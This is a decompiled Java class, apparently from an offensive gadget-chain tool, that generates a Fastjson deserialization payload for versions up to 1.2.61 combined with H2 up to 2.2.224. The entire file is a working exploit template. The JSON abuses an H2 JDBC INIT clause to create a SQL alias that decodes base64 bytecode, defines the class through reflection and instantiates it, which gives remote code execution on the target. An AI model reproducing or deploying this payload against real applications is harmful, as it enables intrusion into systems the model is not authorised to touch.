package com.ar3h.chains.gadget.impl.fastjson;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "H2Jdbc 1.2.47", dependencies = {"com.h2database:h2 <= 2.2.224", "fastjson <= 1.2.61"})
@GadgetTags(tags = {Tag.FastjsonPayload}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/fastjson/FastjsonH2Jdbc.class */
public class FastjsonH2Jdbc implements Gadget {
    public static String template = "{\n    \"x1\": {\n        \"@type\": \"java.lang.Class\",\n        \"val\": \"org.h2.jdbcx.JdbcDataSource\"\n    },\n    {\n        \"@type\": \"com.alibaba.fastjson.JSONObject\",\n        \"c\": {\n            \"@type\": \"org.h2.jdbcx.JdbcDataSource\",\n            \"url\": \"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\\\;CREATE ALIAS EXEC AS 'void exec() throws java.io.IOException { try { byte[] b = java.util.Base64.getDecoder().decode(\\\"%s\\\")\\\\; java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class, int.class, int.class)\\\\; method.setAccessible(true)\\\\; Class c = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), b, 0, b.length)\\\\; c.newInstance()\\\\; } catch (Exception e){ }}'\\\\;CALL EXEC ()\\\\;\"\n        }\n    }: {}\n}";

    private String getObject(byte[] bArr) {
        return String.format(template, Base64.encodeBase64String(bArr));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext));
    }
}
